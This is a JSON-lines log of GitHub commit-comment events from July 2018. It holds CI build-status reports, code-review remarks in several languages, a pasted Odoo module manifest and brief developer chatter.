{"id":"8031326403","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865281,"position":null,"line":null,"path":null,"commit_id":"5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3","created_at":"2018-07-28T00:18:15Z","updated_at":"2018-07-28T00:18:15Z","author_association":"NONE","body":"Myoldmopar-patch-1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T00:18:15Z"}
{"id":"8031327488","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29865285,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-28T00:18:57Z","updated_at":"2018-07-28T00:18:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-28T00:18:57Z"}
{"id":"8031330881","type":"CommitCommentEvent","actor":{"login":"TisonKun"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29865296,"position":null,"line":null,"path":null,"commit_id":"bb2ea6eb07bb3b2520197f9b2a406e0e2cbfb681","created_at":"2018-07-28T00:21:02Z","updated_at":"2018-07-28T00:21:02Z","author_association":"NONE","body":"其实像这种每次都会写的可以设置一下全局 ignore\r\n比方说弄一个 `$HOME/.gitignore_global` 的文件\r\n```\r\n.idea\r\n*.iml\r\n.DS_Store\r\n*.tar.gz\r\n```\r\n然后写一个 `$HOME/.gitconfig` （这个名字有要求）\r\n```\r\n[core]\r\n\texcludesfile = $HOME/.gitignore_global\r\n[user]\r\n\temail = ...\r\n\tname = ...\r\n```"}},"created_at":"2018-07-28T00:21:02Z"}
{"id":"8031330957","type":"CommitCommentEvent","actor":{"login":"dmzuckerman"},"repo":{"name":"dmzuckerman/PhysicalLensOnTheCell"},"payload":{"comment":{"id":29865298,"position":null,"line":null,"path":null,"commit_id":"de962f2a3694e3d1c63d94ae7fefe90089b04217","created_at":"2018-07-28T00:21:05Z","updated_at":"2018-07-28T00:21:05Z","author_association":"OWNER","body":"Am I imagining it or is the font smaller on the last sentence (\"A classic textbook ...\")?"}},"created_at":"2018-07-28T00:21:05Z"}
{"id":"8031350197","type":"CommitCommentEvent","actor":{"login":"tanertas"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29865378,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-28T00:32:27Z","updated_at":"2018-07-28T00:32:27Z","author_association":"CONTRIBUTOR","body":"I don't think that anyone would advise squashing all changes into one commit in your personal repo. My concern is community repo here. I believe that we may develop a different approach on how we treat community repo and our personal repo."}},"created_at":"2018-07-28T00:32:27Z"}
{"id":"8031350890","type":"CommitCommentEvent","actor":{"login":"FlyingJello"},"repo":{"name":"aflyingroch/projet3"},"payload":{"comment":{"id":29865382,"position":null,"line":null,"path":null,"commit_id":"855eb10a17087276127d9ad8dfab4331164f689c","created_at":"2018-07-28T00:32:53Z","updated_at":"2018-07-28T00:32:53Z","author_association":"NONE","body":"oh wow "}},"created_at":"2018-07-28T00:32:53Z"}
{"id":"8031358358","type":"CommitCommentEvent","actor":{"login":"tumugin"},"repo":{"name":"tumugin/WiringOP"},"payload":{"comment":{"id":29865413,"position":null,"line":null,"path":null,"commit_id":"9b688ae1605dccb779a981307c730dc415c0a222","created_at":"2018-07-28T00:37:36Z","updated_at":"2018-07-28T00:37:36Z","author_association":"OWNER","body":"@scargill @fizga \r\nCan you try this?\r\n`git clone https://github.com/tumugin/WiringOP.git -b h5`"}},"created_at":"2018-07-28T00:37:36Z"}
{"id":"8031361982","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29865420,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-28T00:39:44Z","updated_at":"2018-07-28T00:39:44Z","author_association":"MEMBER","body":"This applies to the community repo. It's not for me, but for anyone else who may need to figure out what and why I've changed or revert some particular change.\r\n\r\nPlease learn best practices for using VCS; keyword: atomic commits."}},"created_at":"2018-07-28T00:39:44Z"}
{"id":"8031363042","type":"CommitCommentEvent","actor":{"login":"JamesNewton"},"repo":{"name":"HaddingtonDynamics/Dexter"},"payload":{"comment":{"id":29865422,"position":null,"line":null,"path":null,"commit_id":"243ac0fa3c995effd9c75731d3a9c7ecb70cc73e","created_at":"2018-07-28T00:40:22Z","updated_at":"2018-07-28T00:40:22Z","author_association":"COLLABORATOR","body":"Note that this release of DexRun.c requires an updated FPGA image. Contact us for that file before updating the code."}},"created_at":"2018-07-28T00:40:22Z"}
{"id":"8031363995","type":"CommitCommentEvent","actor":{"login":"immense055"},"repo":{"name":"tinblanc/MyHome"},"payload":{"comment":{"id":29865428,"position":null,"line":null,"path":null,"commit_id":"9954229c992c4bfba7913b15edcc2e9d78c7d973","created_at":"2018-07-28T00:40:56Z","updated_at":"2018-07-28T00:40:56Z","author_association":"NONE","body":"Can I join with you"}},"created_at":"2018-07-28T00:40:56Z"}
{"id":"8031366233","type":"CommitCommentEvent","actor":{"login":"TheAssassin"},"repo":{"name":"AppImage/docs.appimage.org"},"payload":{"comment":{"id":29865443,"position":null,"line":null,"path":null,"commit_id":"33eef2b95e7aeca9dfe73fcaad517a4417775891","created_at":"2018-07-28T00:42:16Z","updated_at":"2018-07-28T00:42:16Z","author_association":"MEMBER","body":"Next time, please also remove the substitution target."}},"created_at":"2018-07-28T00:42:16Z"}
{"id":"8031367967","type":"CommitCommentEvent","actor":{"login":"astocka"},"repo":{"name":"astocka/workshop_2"},"payload":{"comment":{"id":29865450,"position":null,"line":null,"path":null,"commit_id":"c68ed375c0f84e1079a9b2cac3771a50f386d53d","created_at":"2018-07-28T00:43:22Z","updated_at":"2018-07-28T00:43:22Z","author_association":"OWNER","body":"@pwasilewski-netcode, commit do warsztatów nr 2 - Pharmacy Manager "}},"created_at":"2018-07-28T00:43:22Z"}
{"id":"8031368459","type":"CommitCommentEvent","actor":{"login":"TheAssassin"},"repo":{"name":"J5lx/pencil"},"payload":{"comment":{"id":29865451,"position":null,"line":null,"path":null,"commit_id":"d2b40b9cb6941964d435a8349e25bb8c52de1359","created_at":"2018-07-28T00:43:42Z","updated_at":"2018-07-28T00:43:42Z","author_association":"NONE","body":"I'm not entirely sure why (it's probably a combination of `git commit --amend` and `git push -f`), but I've been highlighted in 8 commits now with identical messages. Would you mind removing the `@` in your next commit?"}},"created_at":"2018-07-28T00:43:42Z"}
{"id":"8031370366","type":"CommitCommentEvent","actor":{"login":"Alhssan"},"repo":{"name":"maestrano/odoo"},"payload":{"comment":{"id":29865459,"position":null,"line":null,"path":null,"commit_id":"2abc65859998b8602f613a0ee965b3b6fb0d1724","created_at":"2018-07-28T00:45:04Z","updated_at":"2018-07-28T00:45:04Z","author_association":"NONE","body":"# -*- coding: utf-8 -*-\r\n##############################################################################\r\n#\r\n#    OpenERP, Open Source Management Solution\r\n#    Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).\r\n#\r\n#    This program is free software: you can redistribute it and/or modify\r\n#    it under the terms of the GNU Affero General Public License as\r\n#    published by the Free Software Foundation, either version 3 of the\r\n#    License, or (at your option) any later version.\r\n#\r\n#    This program is distributed in the hope that it will be useful,\r\n#    but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\r\n#    GNU Affero General Public License for more details.\r\n#\r\n#    You should have received a copy of the GNU Affero General Public License\r\n#    along with this program.  If not, see <http://www.gnu.org/licenses/>.\r\n#\r\n##############################################################################\r\n{\r\n    \"name\" : \"Accounting and Finance\",\r\n    \"version\" : \"1.1\",\r\n    \"author\" : \"OpenERP SA\",\r\n    \"category\": 'Accounting & Finance',\r\n    \"sequence\": 10,\r\n    'complexity': \"normal\",\r\n    \"description\": \"\"\"\r\nAccounting Access Rights.\r\n=========================\r\n\r\nThis module gives the admin user the access to all the accounting features\r\nlike the journal items and the chart of accounts.\r\n\r\nIt assigns manager and user access rights to the Administrator, and only\r\nuser rights to Demo user.\r\n    \"\"\",\r\n    'website': 'http://www.openerp.com',\r\n    'init_xml': [],\r\n    \"depends\" : [\"account\"],\r\n    'update_xml': [\r\n        'security/account_security.xml',\r\n        'account_accountant_data.xml'\r\n    ],\r\n    'demo_xml': ['account_accountant_demo.xml'],\r\n    'test': [],\r\n    'installable': True,\r\n    'auto_install': False,\r\n    'application': True,\r\n    'certificate': '00395091383933390541',\r\n}\r\n"}},"created_at":"2018-07-28T00:45:04Z"}
{"id":"8031374832","type":"CommitCommentEvent","actor":{"login":"coddec"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29865478,"position":null,"line":null,"path":null,"commit_id":"ad28acaaa37145bc5f556df102207477df54a38a","created_at":"2018-07-28T00:48:03Z","updated_at":"2018-07-28T00:48:03Z","author_association":"MEMBER","body":"Should we create a new GitHub dev release for this and https://github.com/passionate-coder/Classic-Start/commit/261e01e180f84017f033f7a6d77ff334a0589790 ?"}},"created_at":"2018-07-28T00:48:03Z"}
{"id":"8031375068","type":"CommitCommentEvent","actor":{"login":"klanchman"},"repo":{"name":"klanchman/homebridge-logi-circle-privacy"},"payload":{"comment":{"id":29865480,"position":null,"line":null,"path":null,"commit_id":"e099b4db38253a5d47449cd2a01f6ddf11fece3b","created_at":"2018-07-28T00:48:13Z","updated_at":"2018-07-28T00:48:13Z","author_association":"OWNER","body":"Hi @carlct, thanks for your kind words, glad to hear you are liking the plugin!\r\n\r\nSomeone actually suggested the same thing in issue #1, but for some reason I didn't get an email about it. I am reopening that issue and will work on adding this feature when I have some spare time."}},"created_at":"2018-07-28T00:48:13Z"}
{"id":"8031377586","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29865490,"position":null,"line":null,"path":null,"commit_id":"344bf164516e8a75d9253bd79ee6c8436ba6e9f7","created_at":"2018-07-28T00:49:58Z","updated_at":"2018-07-28T00:49:58Z","author_association":"CONTRIBUTOR","body":"That should break repoman report because banch of its deps do not have x86 keyword. Please double check "}},"created_at":"2018-07-28T00:49:58Z"}
{"id":"8031377883","type":"CommitCommentEvent","actor":{"login":"XenHat"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29865492,"position":null,"line":null,"path":null,"commit_id":"ad28acaaa37145bc5f556df102207477df54a38a","created_at":"2018-07-28T00:50:10Z","updated_at":"2018-07-28T00:50:10Z","author_association":"MEMBER","body":"Nah, wait for #36 to be resolved"}},"created_at":"2018-07-28T00:50:10Z"}
{"id":"8031379225","type":"CommitCommentEvent","actor":{"login":"coddec"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29865497,"position":null,"line":null,"path":null,"commit_id":"ad28acaaa37145bc5f556df102207477df54a38a","created_at":"2018-07-28T00:51:08Z","updated_at":"2018-07-28T00:51:08Z","author_association":"MEMBER","body":"> Nah, wait for #36 to be resolved\r\n\r\nSure ;)"}},"created_at":"2018-07-28T00:51:08Z"}
{"id":"8031379882","type":"CommitCommentEvent","actor":{"login":"TisonKun"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29865502,"position":10,"line":10,"path":"src/3.4_Iterable.h","commit_id":"4ff9e21127cbe09fc3de907d27baea61772acea7","created_at":"2018-07-28T00:51:36Z","updated_at":"2018-07-28T00:51:36Z","author_association":"NONE","body":"这行代码感觉意义不明，好诡异啊"}},"created_at":"2018-07-28T00:51:36Z"}
{"id":"8031380127","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29865503,"position":null,"line":null,"path":null,"commit_id":"f165d1822d7c2cc02c89d6afbc976b2ac78c2b43","created_at":"2018-07-28T00:51:47Z","updated_at":"2018-07-28T00:51:47Z","author_association":"COLLABORATOR","body":"Also see [Issue 694](https://github.com/weidai11/cryptopp/issues/694)."}},"created_at":"2018-07-28T00:51:47Z"}
{"id":"8031380655","type":"CommitCommentEvent","actor":{"login":"rebecastax"},"repo":{"name":"rebecastax/cintablancafinal"},"payload":{"comment":{"id":29865504,"position":null,"line":null,"path":null,"commit_id":"5944ac35a6edbd688a81c66b4b42ff45a3694cad","created_at":"2018-07-28T00:52:10Z","updated_at":"2018-07-28T00:52:10Z","author_association":"OWNER","body":"ahuevo"}},"created_at":"2018-07-28T00:52:10Z"}
{"id":"8031380716","type":"CommitCommentEvent","actor":{"login":"dilo15"},"repo":{"name":"MikaelEdebro/vue-airbnb-style-datepicker"},"payload":{"comment":{"id":29865505,"position":null,"line":null,"path":null,"commit_id":"ea03a12f80627232dba60620547542e4042d540c","created_at":"2018-07-28T00:52:12Z","updated_at":"2018-07-28T00:52:12Z","author_association":"NONE","body":"I think this broke the npm package. I'm on node 9.11 and getting\r\n\r\n`error vue-airbnb-style-datepicker@1.11.1: The engine \"node\" is incompatible with this module. Expected version \"9.5.0\".`\r\n\r\nwhile trying a fresh install for a project."}},"created_at":"2018-07-28T00:52:12Z"}
{"id":"8031382479","type":"CommitCommentEvent","actor":{"login":"TisonKun"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29865512,"position":14,"line":14,"path":"src/4.6_Member_Access_Operator.h","commit_id":"4ff9e21127cbe09fc3de907d27baea61772acea7","created_at":"2018-07-28T00:53:28Z","updated_at":"2018-07-28T00:53:28Z","author_association":"NONE","body":"这个地方也可以写成\r\n```\r\nstring s0 = \"a string\";\r\nstring *p = &s0;\r\n```\r\n因为其实是定义两个不同的类型，一个是 `string` 类，一个是 `string *` 指针，所以分开写会好一点\r\n当然这里的代码本来就很短也无所谓啦"}},"created_at":"2018-07-28T00:53:28Z"}
{"id":"8031383498","type":"CommitCommentEvent","actor":{"login":"TisonKun"},"repo":{"name":"HoshinoTented/LearningCpp"},"payload":{"comment":{"id":29865519,"position":1,"line":1,"path":"src/main.cpp","commit_id":"4ff9e21127cbe09fc3de907d27baea61772acea7","created_at":"2018-07-28T00:54:09Z","updated_at":"2018-07-28T00:54:09Z","author_association":"NONE","body":"哇哦学到了，以前没有这么搞过（笑）"}},"created_at":"2018-07-28T00:54:09Z"}
{"id":"8031387583","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29865528,"position":null,"line":null,"path":null,"commit_id":"344bf164516e8a75d9253bd79ee6c8436ba6e9f7","created_at":"2018-07-28T00:57:00Z","updated_at":"2018-07-28T00:57:00Z","author_association":"CONTRIBUTOR","body":"And your next commit too "}},"created_at":"2018-07-28T00:57:00Z"}
{"id":"8031394498","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"RyanTheOwner/DamienGKit"},"payload":{"comment":{"id":29865564,"position":null,"line":null,"path":null,"commit_id":"e80e654885e3d0f06172e72d997dad9da7a3f318","created_at":"2018-07-28T01:01:35Z","updated_at":"2018-07-28T01:01:35Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): parsing error encountered\nduring parsing: did not find expected key (line 3, column 1), context while\nparsing a block mapping (line 2, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/RyanTheOwner/DamienGKit/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `c5168116-9201-11e8-845f-2a303efbb2d3`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-28T01:01:35Z"}
{"id":"8031398951","type":"CommitCommentEvent","actor":{"login":"art1fa"},"repo":{"name":"signalapp/Signal-Android"},"payload":{"comment":{"id":29865576,"position":null,"line":null,"path":null,"commit_id":"1e895e960f24dcb42011c748061eb95b508bddf7","created_at":"2018-07-28T01:04:39Z","updated_at":"2018-07-28T01:04:39Z","author_association":"CONTRIBUTOR","body":"Since you're currently fixing paddings and margins – don't you think the send / attachment button feels a bit disconnected to the compose bubble? IMO a `marginLeft` between 4dp and 8dp instead of the current 12dp makes it visually clearer that typing and sending a message is a tightly coupled user action."}},"created_at":"2018-07-28T01:04:39Z"}
{"id":"8031400377","type":"CommitCommentEvent","actor":{"login":"kailanguage"},"repo":{"name":"kailanguage/Hello-World"},"payload":{"comment":{"id":29865583,"position":null,"line":null,"path":null,"commit_id":"407b79a22025694e8b87709a7c5a5249d97250e1","created_at":"2018-07-28T01:05:36Z","updated_at":"2018-07-28T01:05:36Z","author_association":"OWNER","body":"### **test**"}},"created_at":"2018-07-28T01:05:36Z"}
{"id":"8031404888","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29865604,"position":null,"line":null,"path":null,"commit_id":"5f9cb6164411debd06171d3986838b3392256647","created_at":"2018-07-28T01:09:02Z","updated_at":"2018-07-28T01:09:02Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/5f9cb6164411debd06171d3986838b3392256647)\n\nBuilt at __20180728 - 01:09:02__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/rpm.txt) | 1068 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/msvc.Debug.txt) | 1065 cases, 0 failed, t: 541s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1065 cases, 0 failed, t: 555s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/msvc.Debug_Dunity_OFF.txt) | 1061 cases, 0 failed, t: 1164s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/msvc.Release.txt) | 1065 cases, 0 failed, t: 394s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 929s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Debug_Dcoverage_ON.txt) | 1068 cases, 0 failed, t: 852s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/clang.Debug.txt) | 1068 cases, 0 failed, t: 276s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Debug.txt) | 1068 cases, 0 failed, t: 288s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/clang.Debug_Dunity_OFF.txt) | 1064 cases, 0 failed, t: 706s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Debug_Dunity_OFF.txt) | 1064 cases, 0 failed, t: 593s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/clang.Release_Dassert_ON.txt) | 1068 cases, 0 failed, t: 393s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Debug_Dstatic_OFF.txt) | 1068 cases, 0 failed, t: 292s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Release_Dassert_ON.txt) | 1068 cases, 0 failed, t: 425s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1068 cases, 0 failed, t: 262s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1068 cases, 0 failed, t: 292s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1064 cases, 0 failed, t: 1018s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/multisig-reserve/2//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1064 cases, 0 failed, t: 1157s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-28T01:09:02Z"}
{"id":"8031405418","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865605,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-28T01:09:28Z","updated_at":"2018-07-28T01:09:28Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2325 of 2327 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-28T01:09:28Z"}
{"id":"8031407186","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865611,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-28T01:10:48Z","updated_at":"2018-07-28T01:10:48Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T01:10:48Z"}
{"id":"8031408698","type":"CommitCommentEvent","actor":{"login":"Stolarskis"},"repo":{"name":"dougbtv/docker-asterisk"},"payload":{"comment":{"id":29865617,"position":null,"line":null,"path":null,"commit_id":"6fdad9f9e1e080ca850df237fe8bc58ef98edd93","created_at":"2018-07-28T01:11:52Z","updated_at":"2018-07-28T01:11:52Z","author_association":"NONE","body":"Thank you, glad to be of some help!"}},"created_at":"2018-07-28T01:11:52Z"}
{"id":"8031411087","type":"CommitCommentEvent","actor":{"login":"t-shio"},"repo":{"name":"ksaegusa/Iac"},"payload":{"comment":{"id":29865621,"position":null,"line":null,"path":null,"commit_id":"913f13866bec5cd4d9c5a44567f0c724b93903d7","created_at":"2018-07-28T01:13:35Z","updated_at":"2018-07-28T01:13:35Z","author_association":"NONE","body":"thank you"}},"created_at":"2018-07-28T01:13:35Z"}
{"id":"8031412296","type":"CommitCommentEvent","actor":{"login":"NguyenSonArsenal"},"repo":{"name":"vuonghieu95/news_crud_laravel"},"payload":{"comment":{"id":29865622,"position":12,"line":12,"path":"CRUD/app/Http/Controllers/LoginController.php","commit_id":"26fe4b5fe085b2cb18025cb53c34d2d9eb5355fa","created_at":"2018-07-28T01:14:27Z","updated_at":"2018-07-28T01:14:27Z","author_association":"NONE","body":"Viết comment = tiếng a"}},"created_at":"2018-07-28T01:14:27Z"}
{"id":"8031413574","type":"CommitCommentEvent","actor":{"login":"NguyenSonArsenal"},"repo":{"name":"vuonghieu95/news_crud_laravel"},"payload":{"comment":{"id":29865630,"position":27,"line":27,"path":"CRUD/app/Http/Controllers/LoginController.php","commit_id":"26fe4b5fe085b2cb18025cb53c34d2d9eb5355fa","created_at":"2018-07-28T01:15:24Z","updated_at":"2018-07-28T01:15:24Z","author_association":"NONE","body":"level cho vào config, sau đó tham khảo hàm getConfig() trong base để lấy ra con số 1 này. "}},"created_at":"2018-07-28T01:15:24Z"}
{"id":"8031414242","type":"CommitCommentEvent","actor":{"login":"t-shio"},"repo":{"name":"ksaegusa/Iac"},"payload":{"comment":{"id":29865632,"position":null,"line":null,"path":null,"commit_id":"92eadc56f1f973b57ba94dc2947438361c3e954e","created_at":"2018-07-28T01:15:51Z","updated_at":"2018-07-28T01:15:51Z","author_association":"NONE","body":"yes"}},"created_at":"2018-07-28T01:15:51Z"}
{"id":"8031415523","type":"CommitCommentEvent","actor":{"login":"Konclan"},"repo":{"name":"BEEmod/BEE2.4"},"payload":{"comment":{"id":29865639,"position":null,"line":null,"path":null,"commit_id":"f1798527651269307518898b80716a3aec00a545","created_at":"2018-07-28T01:16:44Z","updated_at":"2018-07-28T01:16:44Z","author_association":"NONE","body":"BEE2.4 work ahead... yeah I sure hope it does."}},"created_at":"2018-07-28T01:16:44Z"}
{"id":"8031417014","type":"CommitCommentEvent","actor":{"login":"NguyenSonArsenal"},"repo":{"name":"vuonghieu95/news_crud_laravel"},"payload":{"comment":{"id":29865643,"position":20,"line":20,"path":"CRUD/app/User.php","commit_id":"26fe4b5fe085b2cb18025cb53c34d2d9eb5355fa","created_at":"2018-07-28T01:17:52Z","updated_at":"2018-07-28T01:17:52Z","author_association":"NONE","body":"Thiếu khoảng trắng trước trường level"}},"created_at":"2018-07-28T01:17:52Z"}
